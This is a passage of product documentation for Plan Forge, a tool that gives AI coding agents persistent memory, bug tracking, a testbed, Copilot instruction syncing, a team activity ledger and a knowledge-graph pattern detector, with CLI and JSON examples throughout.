plan Phase-1-AUTH), surfaces prior decisions on the same plandatabase migration patterns, "api" → API endpoint design patterns), deduped and capped at 8The hints are emitted as a memory-preload hub event. Any agent runtime listening (Copilot, Claude Code, Cursor) can resolve the hints via search_thoughts and seed its working context, eliminating the cold-start "what did we learn last time" gap.
The file watcher (chapter 6 — Watcher tab) doesn't just emit FS events, it drives capture. When a file change matches a watcher rule, the watcher composes a buildWatcherSearchPrompt payload and pushes it through the same captureMemory path so the change becomes a first-class L2 record and an L3 query.
This closes the loop where edits made between plan slices used to vanish from memory. Now the watcher feeds L1/L2/L3 just like any tool would.
Every capture carries a source field with a strict format: <tool> or <tool>/<subsystem>. validateSourceFormat rejects anything else. This means the Memory tab's "by tool" breakdown is always accurate, no untagged drift.
// Valid
"forge_run_plan"
"forge_run_plan/slice-executor"
"watcher/fs-rule"
"hook/pre-deploy"
// Rejected (logged, capture still proceeds, source replaced with "unknown")
"My Tool"
"forge_run_plan / slice-executor" // spaces around slash
""
Schema changes (the _v field bumps) are handled by the migration switch in pforge.ps1 / pforge.sh:
# Inspect what would migrate (no writes)
pforge migrate-memory --dry-run
# Apply: rewrites every .forge/*.jsonl record to the latest _v
pforge migrate-memory
# Migration is idempotent, running twice is a no-op
Originals are backed up to .forge/.migration-backup-<timestamp>/ before any rewrite.
Three helpers in memory.mjs drive everything the dashboard shows:
buildCaptureTelemetry(), totals, deduped count, by-tool and by-type histograms (cosine-similarity dedup at write time)buildCacheEntry() + isCacheEntryFresh(), search-result cache with TTL stamping (stampThoughtExpiry) and read-time filtering (filterUnexpiredThoughts)buildMemoryReport(projectDir), assembles the full payload behind forge_memory_report / /api/memory/report: file inventory, version distribution, queue depth, drain trend, orphan detectionpforge-mcp/memory.mjs, every helper above, with inline section markers (─── G3.x ───, ─── GX.x ───)forge_memory_report, the underlying tool (chapter 10)📄 v2.36.0 changelog: View CHANGELOG on GitHub.
The plain-English tour of Plan Forge's upgraded memory system, and the reason a cheaper, faster model can now do work that used to require the expensive one.
Think of the forge shop. The L1/L2/L3 memory tiers are the workbench, the filing cabinet, and the library across town. They were already there. What we added is the craftsmanship around them:
| Piece | The shop metaphor | What it actually does |
|---|---|---|
| Hallmark | The maker's mark stamped into the metal, proves who forged it, when, from what stock. | A small JSON envelope (hallmark/v1) attached to every memory record and artifact. Lets any tool ask "is this still the version I think it is?" and catch drift before it bites. |
| Anvil | The anvil where everything gets struck, solid, reliable, never drops the hammer. | The boundary code that delivers L2 records to OpenBrain (L3). Adds a dead-letter queue, a capability handshake, and a boot-time drain so a network blip never loses a memory. |
| Lattice | The map of the shop, every workbench, every tool, every chain pulley, indexed by where it sits. | A code-graph index over your repo. Splits source into semantic chunks, records who-calls-whom, and answers "show me everyone who calls executeSlice" in milliseconds. |
| forge_sync_memories | The dispatch rider that carries shop news to the wider guild. | A soft-sync that copies decisions/lessons/gotchas from .forge/ into Copilot's own Memory store, so VS Code agents see them automatically next session. |
Here's what happens when pforge run-plan starts executing slice 3 of your plan. Every step touches at least one memory subsystem:
buildPlanBootContext and emits a memory-preload event with semantic queries derived from the slice's Scope Contract. The agent runtime (Copilot, Claude, Cursor) catches the event and runs search_thoughts against L3 + a latticeQuery against the code-graph. The agent now knows what prior slices learned and which files are relevant, before it reads a single line.
grep -c when piped into a brace group"), it calls capture_thought with type gotcha. The capture path stamps the record with a fresh Hallmark envelope and writes to L1 (instant), L2 (durable), and queues it for L3.
.forge/openbrain-queue.jsonl and pushes to OpenBrain. If OpenBrain is down or rejects the schema, the record lands in .forge/openbrain-dlq.jsonl instead of vanishing. The next boot drains the DLQ automatically.
latticeCallers on every function it touched. If the call graph shows an unexpected caller (a test it forgot about, or a sibling slice's import), the slice gate catches it. This is the step that prevents "I refactored X and didn't realize Y depended on it."
forge_sync_memories copies new decisions and lessons into Copilot Memory. Tomorrow's VS Code session sees them in the global memory pane without anyone running anything.
This is the part most teams don't expect.
The classic AI cost equation goes better model → fewer mistakes → less wasted spend. That's still true, but it ignores a second lever: context quality. A medium-tier model with the right context will routinely outperform a flagship model with vague context. Memory is context. And the memory upgrades make the context dramatically better.
Here's the receipt, measured on this repo over the last 90 days:
| Metric | Before the upgrades | After (current) | What it means |
|---|---|---|---|
| Drift score | 22 | 8 | Architecture decay per session, lower is better. −64%. |
| Sonnet-4.6 success rate | ~78% (estimated) | 91% (332 / 365 slices) | Cheaper model now beats what Opus did a quarter ago. |
| Cost per slice | ~$0.09 | $0.04 | Less re-reading, less back-and-forth, less escalation. ~55% cheaper. |
| Opus escalation rate | Multiple slices per plan | Zero on QA-class plans | The memory-QA plan executed 7 slices for $0.07 on Sonnet alone. |
| OpenBrain DLQ depth | N/A (would have dropped) | 0 (Anvil catches all) | Zero memories lost to transient L3 failures. |
| Telemetry dedup rate | ~0% (no dedup) | 62.5% (10 of 16) | Hallmark's content hash collapses redundant writes. |
Put bluntly: the memory upgrades subsidize the model choice. You can pick Sonnet (or another mid-tier) and let memory carry the load that used to require Opus reasoning. The savings show up in the cost ledger; the quality shows up in the drift score.
The memory subsystems are exposed through the pforge CLI and the MCP server. Here are the three you'll use most:
# What does the agent see when it asks "where is snapshot restore handled?"
pforge lattice query "snapshot restore"
# Who calls this function?
pforge lattice callers executeSlice
# What does this function call?
pforge lattice callees attachSliceSnapshotRestore
# Health of every memory surface, L2 files, OpenBrain queue, DLQ, dedup rate, orphans
pforge memory report
# 90-day trend across drift / cost / models / incidents
pforge health-trend --days 90
# Push new decisions / lessons / gotchas into Copilot's own memory store.
# Safe to re-run, dedupes by content hash.
pforge sync-memories
# Dry-run preview (shows what would be written, writes nothing)
pforge sync-memories --dry-run
The live dashboard (localhost:3100/dashboard) added an Anvil & Lattice tab when these subsystems shipped. From there you can see:
_v stamp. Should sit at 100% for newly-written records; older records may show none.To make sure the mental model holds, here's the same picture from Chapter 21 with the new pieces drawn in:
┌─────────────────────────────────────────────────────────────────┐
│ Copilot Memory (cross-session, IDE-wide) │
│ ▲ │
│ │ forge_sync_memories (additive, hash-deduped) │
│ ┌────┴─────────────────────────────────────────────────────┐ │
│ │ L3, OpenBrain (pgvector, cross-project) │ │
│ │ ▲ │ │
│ │ │ Anvil (DLQ + capability handshake + boot drain) │ │
│ │ ┌────┴─────────────────────────────────────────────┐ │ │
│ │ │ L2, .forge/*.jsonl (Hallmark-stamped, _v:1) │ │ │
│ │ │ L1, Hub (in-process, runId-scoped) │ │ │
│ │ └──────────────────────────────────────────────────┘ │ │
│ └──────────────────────────────────────────────────────────┘ │
│ │
│ Parallel axis (not a tier): │
│ Lattice, .forge/lattice/{chunks,edges}.jsonl │
│ (code-graph; queried alongside, not stacked on, memory) │
└─────────────────────────────────────────────────────────────────┘
L1/L2/L3 are the same tiers. Hallmark adds a contract to what gets written. Anvil hardens the L2 → L3 doorway. forge_sync_memories pushes upward into Copilot. Lattice sits beside everything as a separate code-graph axis the agent queries the same way it queries memory.
forge_memory_report, forge_hallmark_show, forge_hallmark_verify, and the lattice tools.pforge lattice, pforge memory, and pforge sync-memories subcommand.
Every bug, fingerprinted. Every fix, validated. The registry remembers.
forge_bug_register → forge_bug_list → forge_bug_update_status → forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json.
Bugs found by the Tempering quorum, visual-diff scanners, or regression guard used to live in ad-hoc CHANGELOG entries and stray comments. They got fixed, forgotten, and then re-discovered three sprints later with different symptoms. The Bug Registry gives every scanner-discovered bug a durable record, fingerprinted, classified, tracked, and validated.
When a bug is registered, the classifier computes a fingerprint from the scanner name + test name + assertion message + normalized stack trace. Re-registering the same fingerprint returns DUPLICATE_BUG with the existing bugId, no noise, no duplication.
Every bug moves through an explicit state machine:
open → in-fix → validating → fixed
↘ wont-fix
↘ duplicate
open → noise (classifier ruled it a false positive)
Transitions are enforced by forge_bug_update_status. An illegal transition returns INVALID_TRANSITION.
The classifier inspects evidence (test name, assertion message, stack trace, flakiness history) and returns one of:
real-bug, evidence is consistent across scanners; record is persisted and captured to L3 memory.flaky, evidence shows inconsistency; ignored unless confirmed across multiple runs.noise, a triage classification applied by the audit classifier (e.g. "known false-positive pattern"). It is not a bug status. Bugs flagged as noise are typically resolved as wont-fix with the classification recorded in bug.triage.Only real-bug outcomes write to .forge/bugs/ and fire tempering-bug-registered.
forge_bug_validate_fix re-runs the scanner that originally found the bug. On pass, the record moves to fixed, a tempering-bug-validated-fixed event fires, and, if OpenBrain is configured, an L3 thought is written so the next session knows what broke and what fixed it.
scannerOverride to validate with an equivalent. The validation log preserves both scanner names for audit.
The dashboard's Triage tab shows open bugs by severity, with status chips and quick-transition buttons. The Watcher's Home chip includes an open bugs count. Cross-linked to incidents via forge_incident_capture.
A separate repo. A library of scenarios. End-to-end proof that the shop still works.
forge_testbed_run. Scenarios: docs/plans/testbed-scenarios/*.json. Findings: docs/plans/testbed-findings/*.json. Requires testbed.path in .forge.json.
Unit tests cover one module; integration tests cover one service. Neither tells you whether the full Plan-Forge pipeline still produces a clean, shippable outcome on a real repo under a real scenario. The Testbed does, it's a second, dedicated repository that Plan Forge treats as a read-write fixture, replays a scenario against, and records the defect log.
The canonical reference testbed lives at srnichols/plan-forge-testbed. It's a real .NET 10 application, TimeTracker, a billable-hours tracker with Clients, Projects, Time Entries, Billing, Invoices, and Dashboard surfaces, used as the worked example throughout this manual.
If you're learning Plan-Forge by doing, work through it in this order:
docs/plans/Phase-1-CLIENTS-CRUD-PLAN.md), see how pforge run-plan drives a four-slice CRUD feature with [P] parallelism, [depends:], [scope:], and validation gates.docs/plans/Phase-2-WEB-UI-PLAN.md), Plan-Forge builds a Blazor Server + Microsoft Fluent UI front-end against the existing REST API. The plan demonstrates that pforge produces enterprise-grade UI: layered (page → service interface → repository, never DbContext in components), accessible (WCAG 2.1 AA), and tested (bUnit). This is the proof artifact for "pforge does not vibe-code."docs/plans/testbed-scenarios/*.json), the synthetic regressions in the section below, replayed end-to-end via forge_testbed_run.The .NET preset ships three artifacts that make Step 2 work on any consuming project, they're not testbed-specific:
| Artifact | Path | Purpose |
|---|---|---|
| Instruction file | .github/instructions/blazor-fluent-ui.instructions.md | Auto-loads on *.razor edits. Forbids DbContext in components, mandates code-behind split, lifecycle discipline, accessibility checklist. |
| Reviewer agent | .github/agents/blazor-reviewer.agent.md | Read-only audit of UI changes for layer violations, lifecycle bugs, and Fluent UI misuse. |
| Skill | .github/skills/ui-scaffold/SKILL.md | /ui-scaffold <Entity> --crud generates the page + DTO + service interface + bUnit test in one shot, enforcing the layering rules. |
DbContext in .razor, every page accessible, every component tested.
Scenarios are JSON files under docs/plans/testbed-scenarios/. Each one describes:
A scenario is idempotent: the Testbed resets the fixture repo to the pinned commit before every run.
forge_testbed_run:
.forge/testbed.lock (one scenario at a time per testbed).ERR_TESTBED_DIRTY if not).docs/plans/testbed-findings/ and emits testbed-scenario-completed.| Code | Meaning | Recovery |
|---|---|---|
ERR_TESTBED_NOT_FOUND | testbed.path missing or invalid | Set it in .forge.json |
ERR_TESTBED_DIRTY | Uncommitted changes in the testbed | Commit or stash inside the testbed repo |
ERR_TESTBED_LOCKED | Another scenario is running | Wait, or remove a stale .forge/testbed.lock |
Findings with defects feed two consumers:
forge_bug_register.
A single fingerprint for "how healthy is this project today?", persisted, trended, compared.
forge_health_trend (LiveGuard), writes .forge/health-dna.jsonl. Intent: health-dna. Aliases: health-analysis, system-health, health-report.
Any single metric can lie. A project with 100% green tests can still be drowning in drift. A low drift score can mask a CVE backlog. The Health DNA combines five independent signals into one daily fingerprint so slow decay, the kind where everything looks fine but tomorrow's plan costs 2× yesterday's, becomes visible.
| Signal | Source | What it catches |
|---|---|---|
| Drift score | forge_drift_report | Architecture diverging from plan baseline |
| Incident rate | forge_incident_capture | Production failures over trailing window |
| Test pass rate | CI + testbed findings | Regression risk |
| Model success rate | Orchestrator telemetry | Agent failures + escalation frequency |
| Cost per slice | Cost ledger | Token-burn creep, the project getting harder to reason about |
{
"timestamp": "2026-04-20T00:00:00Z",
"driftScore": 0.91,
"incidentRate7d": 0,
"testPassRate": 0.998,
"modelSuccessRate": 0.96,
"costPerSlice": 0.34,
"composite": 0.93,
"delta7d": -0.02,
"delta30d": -0.08
}
composite is a weighted blend computed inside forge_health_trend (current default weights: drift 0.30, incident-rate 0.25, test-pass 0.20, model-success 0.15, cost 0.10, see pforge-mcp/server.mjs). delta7d and delta30d compare against historical records, a small negative delta is noise, a sustained negative delta is decay.
The watcher can alert on Health DNA thresholds:
delta7d < -0.10, short-term regression, usually tied to a specific slice.delta30d < -0.15, long-term decay, usually architectural.composite < 0.60, absolute floor; blocks new executions until addressed.The LiveGuard dashboard's Health tab renders the composite score as a sparkline, with per-signal sub-lines toggleable. The Forge Intelligence page cross-references Health DNA with the OpenBrain memory corpus, "your drift score dropped the day you added the new caching layer" is exactly the kind of conclusion the Learn station exists to surface.
How Plan Forge teaches GitHub Copilot about your project, three tools, two generated files, one dashboard tab, zero manual setup after the first run.
forge_sync_memories, forge_sync_instructions, and the Settings → Copilot dashboard tab. Together they make every new Copilot conversation start with full project context, no manual context-paste, no copy-and-rebuild instruction files.
GitHub Copilot reads two files automatically when you open a workspace:
.github/copilot-instructions.md, "what you must always know about this project". Architectural rules, naming conventions, build commands, security commitments..github/copilot-memory-hints.md, "what we've learned from doing this work". Trajectories from prior plans, recurring patterns, auto-skills extracted from successful slices.Both files exist before Plan Forge, you can hand-author them. But hand-authoring means: (a) they go stale the moment you ship the next plan, (b) every team member writes a slightly different one, and (c) when the underlying decisions change in .forge.json or PROJECT-PRINCIPLES.md, nothing reminds you to regenerate.
The trilogy solves all three problems by making both files build outputs, not human-authored sources:
| Tool | Writes | Reads from | Run when |
|---|---|---|---|
forge_sync_instructions |
.github/copilot-instructions.md |
project profile, principles, extra .instructions.md files, .forge.json |
Architectural rules change |
forge_sync_memories |
.github/copilot-memory-hints.md |
trajectories (.forge/trajectories/), auto-skills, brain entries |
After each plan ships |
| Settings → Copilot tab | — (preview + apply both above) | live state from the two tools | Anytime you want to inspect before applying |
forge_sync_instructions handles the "always true" facts; forge_sync_memories handles the "we learned this last week" facts. The dashboard tab handles "let me look before I commit".
Both tools are idempotent and additive. They use content-hash deduplication, so running the same sync twice in a row produces zero file changes. They also use atomic write (temp file + rename), so a crash mid-write never leaves a half-baked file.
forge_sync_instructions — the "always true" fileforge_sync_instructions generates .github/copilot-instructions.md by composing four sources, in this order:
docs/plans/PROJECT-PROFILE.md), the tech stack, build commands, key paths. Generated once via the project-profile.prompt.md in Session 1.docs/plans/PROJECT-PRINCIPLES.md), non-negotiable architectural and engineering commitments. Generated via project-principles.prompt.md..github/instructions/*.instructions.md), auto-loaded by Copilot via their applyTo frontmatter. The trilogy stitches the relevant ones into the master file so Copilot sees them as a single context..forge.json commitments, tech choices that the project has locked in (e.g. "database": "postgres", "frontend": "react").The output is a single Markdown file ~150–400 lines (depends on profile complexity) with a deterministic structure: Identity → Stack → Build commands → Architectural rules → Forbidden patterns → Cost guardrails → Talking to Plan Forge tools.
# Generate (preview only, does not write)
pforge sync-instructions --preview
# Generate and write
pforge sync-instructions
# Force overwrite even if file is identical (skips hash check)
pforge sync-instructions --force
forge_sync_instructions({ preview: true })
// → { ok: true, written: false, diff: "...", contentHash: "sha256:..." }
forge_sync_instructions({ preview: false })
// → { ok: true, written: true, path: ".github/copilot-instructions.md", contentHash: "..." }
The generated file follows a canonical template so that Copilot Chat's prompt-injection logic finds the same anchors every time:
# Instructions for Copilot
> **Project**: <name>
> **Stack**: <stack summary>
> **Generated by**: forge_sync_instructions @ v3.x
## Architecture Principles
<merged from architecture-principles.instructions.md + project-principles>
## Project Overview
<merged from PROJECT-PROFILE.md>
## Quick Commands
<merged from project profile + .forge.json>
## Coding Standards
<stack-specific from instructions/>
## Planning & Execution
<pipeline + prompts overview>
## Cost Estimates
<always-included; mandates forge_estimate_quorum>
## Talking to Forge-Master
<always-included; mandates forge_master_ask for open-ended reasoning>
forge_sync_memories — the "we learned this" fileforge_sync_memories generates .github/copilot-memory-hints.md by harvesting three runtime sources:
.forge/trajectories/*.jsonl), per-slice notes the worker left for itself: "I tried X, it failed because Y, so I switched to Z". These are the gold for "don't repeat this mistake" guidance..forge/auto-skills/*.md), reusable patterns extracted by the Inner Loop. If three slices all needed the same shape of repository test, the fourth slice gets it for free as a skill, and Copilot Chat should know it exists too.forge_memory_capture or auto-stamped by tools like forge_run_plan.Each source is filtered, hashed, deduped, and ranked by recency × signal strength. The output is bounded to ~80–120 lines so Copilot's context budget stays healthy.
<!-- pforge:custom --> / <!-- /pforge:custom --> markers, the sync tool preserves it verbatim. Only the <!-- pforge:auto --> region is regenerated.
# After every plan ships
pforge sync-memories
# Limit to last N trajectories (default: 50)
pforge sync-memories --since=14d
# Verbose: show which entries were included/excluded and why
pforge sync-memories --explain
# Copilot Memory Hints
> **Generated by**: forge_sync_memories @ v3.x
> **Last sync**: 2026-05-17T14:22:11Z · 47 trajectories, 12 auto-skills, 8 brain entries
<!-- pforge:auto -->
## Recently learned patterns
- **Snapshot pop** uses `git stash apply` + explicit drop, not blind `git stash pop` (lesson from #201)
- **Vitest output parser** ignores subagent hallucination markers (lesson from #198)
- ...
## Auto-skills available
- `repository-vitest-pattern`, generated 2026-05-12 from 4 slices
- `bicep-rbac-scaffold`, generated 2026-05-10 from 3 slices
<!-- /pforge:auto -->
<!-- pforge:custom -->
<!-- Anything you write here is preserved across syncs -->
<!-- /pforge:custom -->
If you'd rather see the diff before it lands, open the dashboard and navigate to Settings → Copilot. The tab gives you four panels:
| Panel | Shows | Actions |
|---|---|---|
| Current file | Live content of .github/copilot-instructions.md |
Read-only viewer with syntax highlighting |
| Preview regenerated | What forge_sync_instructions would write right now |
Inline diff vs the current file |
| Memory hints | Live content of copilot-memory-hints.md + count of entries by source |
"Regenerate now" button → calls forge_sync_memories |
| Apply | Confirmation banner with the hash of what's about to be written | "Sync instructions" / "Sync memories" / "Sync both" buttons |
Backed by three REST endpoints (full reference: Appendix W — Copilot integration):
GET /api/copilot-instructions # read current file
POST /api/copilot-instructions/preview # generate without writing
POST /api/copilot-instructions/sync # generate + write atomically
| Event | Run | Why |
|---|---|---|
| Initial project setup | sync-instructions |
Bootstraps Copilot with stack + commands |
After edits to PROJECT-PROFILE.md or PROJECT-PRINCIPLES.md |
sync-instructions |
Architectural facts changed |
| After a plan ships | sync-memories |
New trajectories, possibly new auto-skills |
| Weekly maintenance | Both | Catch drift; safe even if nothing changed (hash dedup skips no-op writes) |
CI on main push |
Both, with --preview + fail-on-diff |
Catches "developer forgot to sync after editing PRINCIPLES" |
pforge sync-memories into the PostSlice hook (already shipped in templates/.github/hooks/PostSlice.md). Every successful slice now feeds the next Copilot conversation. Zero manual upkeep.
For the full tool-by-tool reference, see docs/capabilities.md on GitHub. The three trilogy surfaces, at a glance:
| Surface | MCP tool | CLI | REST | Since |
|---|---|---|---|---|
| Memory hints | forge_sync_memories |
pforge sync-memories |
— (CLI-only) | v2.99 |
| Instructions | forge_sync_instructions |
pforge sync-instructions |
POST /api/copilot-instructions/sync |
v3.0 |
| Dashboard tab | — (UI) | — (UI) | GET /api/copilot-instructionsPOST /api/copilot-instructions/preview |
v3.1 |
Two developers running Plan Forge on the same repo at the same time hit three predictable problems: concurrent edits collide at merge time, hard-won fixes stay trapped in one developer's local .forge/, and a productive day turns every reviewer into a bottleneck. This chapter shows how Plan Forge solves all three with a single shared file and a few GitHub API calls, no SaaS backend, no shared database, no new identity system.
forge_team_dashboard + forge_team_activity (per-developer visibility), forge_github_metrics + forge_github_status (PR throughput + validation stack), forge_delegate_review (dispatching review to Copilot's cloud agent), and forge_classifier_issue (closing the tempering audit loop by filing a GitHub issue when a classifier rule needs to land).
The three coordination problems in detail:
.forge/.v3.x addresses each, in order: team dashboard for visibility, shared activity ledger + memory sync for institutional memory, delegated review for the review bottleneck.
Everything starts with one file: .forge/team-activity.jsonl. It is an append-only JSON Lines log that every Plan Forge operation writes to. One event per line, never edited, never compacted.
{"ts":"2026-05-17T09:14:22Z","actor":"alice@example.com","action":"plan.start","plan":"Phase-31","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:18:41Z","actor":"alice@example.com","action":"slice.commit","plan":"Phase-31","slice":"2","sha":"e4f5g6h"}
{"ts":"2026-05-17T09:31:02Z","actor":"bob@example.com","action":"plan.start","plan":"Phase-32","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:33:11Z","actor":"alice@example.com","action":"plan.complete","plan":"Phase-31","slices":6,"costUsd":2.41}
The file is small (typical: 50–200 KB per team-week), git-friendly (line-stable), and trivially indexable. Every team query in this chapter is a streaming read of this file.
.forge/team-activity.jsonl is not gitignored, that's the point. Commit it. The ledger is most useful when every developer's events land in one shared history. If you don't want it in git, set team.ledger.gitignore: true in .forge.json and use a side channel (S3, shared volume) instead.
forge_team_dashboard — per-developer cardsforge_team_dashboard reduces the ledger into one card per developer, capturing the last 7 days (default; configurable):
forge_team_dashboard({ windowDays: 7 })
// Response shape (excerpt):
{
generatedAt: "2026-05-17T14:00:00Z",
windowDays: 7,
developers: [
{
actor: "alice@example.com",
lastActive: "2026-05-17T09:33:11Z",
runs: 12,
successRate: 0.917,
costUsd: 28.40,
plans: ["Phase-31", "Phase-30", "Phase-29"],
activePlan: null
},
{
actor: "bob@example.com",
lastActive: "2026-05-17T09:31:02Z",
runs: 4,
successRate: 1.0,
costUsd: 6.12,
plans: ["Phase-32"],
activePlan: "Phase-32" // currently running
}
],
totals: { runs: 16, successRate: 0.938, costUsd: 34.52 }
}
This is what backs the Team dashboard tab, one card per developer, sorted by recency, with a visual badge for "currently running a plan". The same shape powers the pforge team-dashboard CLI command for terminal users.
Above the cards, the dashboard renders a conflict-risk banner computed from the active plans of any two developers running simultaneously. The risk score is derived from Scope Contract overlap:
| Score | Trigger | Banner |
|---|---|---|
| none | No active plans, or disjoint Scope Contracts | (hidden) |
| low | Active plans touch sibling files in the same directory | "Alice and Bob are both working in src/orders/, sync up before merge." |
| medium | Active plans share at least one file path | "⚠️ Alice and Bob are both editing src/orders/repository.ts." |
| high | Active plans share files AND share modified symbols (per forge_diff) |
"🚨 High collision risk. One of you should pause." |
forge_team_activity — querying the ledgerWhere forge_team_dashboard aggregates, forge_team_activity queries. Pass any combination of filters:
forge_team_activity({
actor: "alice@example.com", // optional, who
plan: "Phase-31", // optional, what
action: "slice.commit", // optional, kind
since: "2026-05-10T00:00:00Z",// optional, when
limit: 100, // bounded; default 50, max 1000
cursor: null // pagination
})
// Response:
{
events: [ /* event objects */ ],
total: 47,
hasMore: false,
cursor: null
}
This is the tool to reach for when answering questions like "what did Alice work on last week?" or "show me every slice that Phase-31 took and who ran which retry". It is also the data source for the pforge team-activity CLI and the GET /api/team/activity REST endpoint.
forge_github_metrics + forge_github_statusThe activity ledger captures everything that happens inside Plan Forge. forge_github_metrics and forge_github_status capture everything that happens around it: PR throughput, review latency, CI validation results.
forge_github_metricsPulls PR-level analytics from the GitHub API:
The dashboard's GH Metrics tab is a thin renderer over this tool's response.
forge_github_statusThe validation stack on a single PR. Given a PR number, returns:
forge_team_activity({ action: "plan.complete" }) → for each plan, find its PR → forge_github_status({ pr: N }). This gives you a single-pane view of "what shipped last week and what state is each PR in".
forge_delegate_review — dispatching to CopilotPlan Forge's reviewer step (the Reviewer Gate) is independent, a fresh session reads the plan's Scope Contract and audits the diff. By default it runs locally. forge_delegate_review dispatches the same audit task to the GitHub Copilot cloud coding agent, so the review happens server-side and the result lands as a PR comment.
forge_delegate_review({
pr: 247,
plan: "docs/plans/Phase-31-PLAN.md",
scope: "scope-contract", // or "full-plan" | "diff-only"
blockOn: "critical" // file CHANGES_REQUESTED on critical findings
})
// Response:
{
ok: true,
jobId: "copilot-job-7f3a...",
dispatched: "2026-05-17T14:22:11Z",
pr: 247,
estimatedCompletion: "2026-05-17T14:27:00Z"
}
Configuration lives under cloudAgentValidation in .forge.json:
{
"cloudAgentValidation": {
"enabled": true,
"agent": "copilot", // current option: copilot
"trigger": "post-slice-commit", // when to dispatch
"blockOn": "critical",
"timeoutMinutes": 15,
"fallback": "local-reviewer" // if cloud dispatch fails
}
}
forge_classifier_issue — closing the audit loopThe tempering subsystem (Audit Loop chapter) audits classifier output and finds false-positive findings or missed-detection rules. Once tempering has confirmed a rule is needed, forge_classifier_issue files a structured GitHub issue against the rule repository so the rule lands in code, not in a side note.
forge_classifier_issue({
classifier: "audit",
ruleId: "audit-stub-detection",
category: "missed-detection", // or "false-positive"
evidence: [ /* before/after finding pairs */ ],
severity: "high",
rationale: "Three sweeps in a row missed inline TODO markers in JSX comments."
})
// Response:
{
ok: true,
issueNumber: 312,
issueUrl: "https://github.com/.../issues/312",
deduped: false,
hash: "sha256:..."
}
The tool deduplicates against open issues with the same rule + category hash within 14 days, so repeated audit findings don't spam the tracker. This is the official "self-repair" path for classifier rules, analogous to forge_meta_bug_file for plan/orchestrator/prompt defects.
| Tab | Backed by | Surfaces |
|---|---|---|
| Team | forge_team_dashboard |
Per-developer cards, conflict-risk banner, "currently running" badges |
| Team Activity | forge_team_activity |
Timeline view of the ledger with filter chips |
| GH Metrics | forge_github_metrics |
PR throughput, review latency, per-author breakdown |
| PR Status (drill from any PR link) | forge_github_status |
Required checks, reviewers, mergeability |
pforge team-dashboard # per-developer cards in the terminal
pforge team-dashboard --json # machine-readable
pforge team-activity --since=7d # query the ledger
pforge team-activity --actor=alice@example.com --action=slice.commit
pforge gh-metrics --window=30d # PR throughput
pforge gh-status --pr=247 # validation stack for one PR
pforge delegate-review --pr=247 --plan=docs/plans/Phase-31-PLAN.md
forge_classifier_issue dispatches. Chapter 26 — The Copilot Integration Trilogy for how shared memory hints close the "Bob hits Alice's bug" gap. Chapter 7 — The Dashboard for the full tab tour.
Plan Forge writes structured events on every action, slice starts, gate failures, commits, bug filings, cost samples. The knowledge graph stitches those events into a queryable graph, then runs four pattern detectors and a daily digest aggregator across it. The result: you find recurring failures before the failures find you.
forge_graph_query introduced the graph itself; forge_patterns_list added the four detectors; pforge digest ships the daily roll-up that surfaces the most actionable findings into the dashboard's Yesterday's Digest tile.
Every Plan Forge subsystem already writes its own structured log: .forge/runs/*.jsonl, .forge/trajectories/*.jsonl, .forge/bugs/*.json, .forge/cost/*.json, .forge/team-activity.jsonl. Individually, each file answers one question, "what did this run cost?", "what bugs are open?". The interesting questions are cross-file:
integration domain?"Answering any of these requires joining at least three logs. The knowledge graph builds an in-memory representation of those joins so the answer is a millisecond traversal, not a five-file grep.
Seven node types: Phase, Slice, Commit, File, Run, Bug, CostSample. Six edge types. The whole graph for a year of plans on a medium-sized repo fits in <30 MB of memory and serializes to .forge/graph/snapshot.json in under a second.
The graph is derived, not authoritative. If snapshot.json is deleted, pforge graph rebuild recomputes it from the underlying logs. The logs are the source of truth; the graph is the index.
forge_graph_query — the query surfaceQueries take a starting node selector and a traversal expression. The tool is intentionally not a general-purpose graph query language, it ships with a small, opinionated set of canned queries that answer the questions teams actually ask:
forge_graph_query({ query: "hot-files", windowDays: 30 })
// → files touched by the most failed slices in the last 30 days
forge_graph_query({ query: "bug-clusters", windowDays: 90 })
// → bugs grouped by shared file/symbol
forge_graph_query({ query: "model-leaderboard", domain: "integration" })
// → success rate per model on slices tagged with the integration domain
forge_graph_query({ query: "slice-history", slice: "4", windowDays: 180 })
// → every Phase that had a slice 4, with success/cost/duration
forge_graph_query({ query: "phase-roi", phase: "Phase-31" })
// → cost, duration, file churn, bugs raised, bugs closed for one phase
Custom traversals are also accepted via the lower-level traverse form (advanced):
forge_graph_query({
start: { type: "File", path: "src/orders/repository.ts" },
follow: ["touches<-Commit", "produced<-Slice", "raised->Bug"],
filter: { "Bug.status": "open" },
return: ["Bug.id", "Bug.title", "Slice.id", "Phase.id"],
limit: 25
})
forge_patterns_list — the four detectorsforge_patterns_list runs four detector heuristics across the graph and returns ranked findings. Each detector is implemented as a deterministic graph traversal, no ML, no embeddings, just structural pattern matching.
| Detector | Looks for | Signal |
|---|---|---|
gate-failure-recurrence |
Same gate failing across ≥3 slices in different plans within 30 days | "The validation is broken, not the code" |
model-failure-rate-by-complexity |
Models whose failure rate climbs steeply with slice complexity | "Use a flagship model for the hard slices, fast model for the easy ones" |
slice-flap-pattern |
Slices that succeed-then-fail-then-succeed on retry (non-monotonic outcomes) | "Flaky gate or non-deterministic test in this slice" |
cost-anomaly |
Runs whose cost-per-slice exceeds the 90-day median by ≥2.5× | "Token blow-up, investigate retry logic or context bloat" |
forge_patterns_list({ windowDays: 30, limit: 10 })
// Response:
{
generatedAt: "2026-05-17T14:00:00Z",
windowDays: 30,
patterns: [
{
detector: "gate-failure-recurrence",
severity: "high",
title: "Gate 'tsc --noEmit' failed in 5 slices across 3 plans",
evidence: { slices: ["Phase-29:3", "Phase-30:1", "Phase-30:4", "Phase-31:2", "Phase-31:5"], commonError: "TS2307: Cannot find module ..." },
suggestedAction: "Investigate tsconfig path mapping; consider widening gate or fixing build config."
},
{
detector: "cost-anomaly",
severity: "medium",
title: "Phase-31 cost/slice 3.1× over 90-day median",
evidence: { phase: "Phase-31", medianUsd: 0.42, observedUsd: 1.31, primarySuspect: "long-context-retries" }
}
// ...
],
total: 7
}
The Recurring Patterns dashboard panel is a thin renderer over this tool's output, sorted by severity descending. Each finding has a "Suppress for 7 days" button (the suppression list lives in .forge/patterns-suppressions.json, see Conventions for the format).
pforge digest — Yesterday's DigestThe graph and the detectors give you raw findings. pforge digest compresses them into a single human-readable summary intended to be the first thing you read each morning.
pforge digest
pforge digest --since=24h # default
pforge digest --since=7d # weekly roll-up
pforge digest --format=json # machine-readable
pforge digest --post # post to configured notification channel
A typical digest collects six categories of finding:
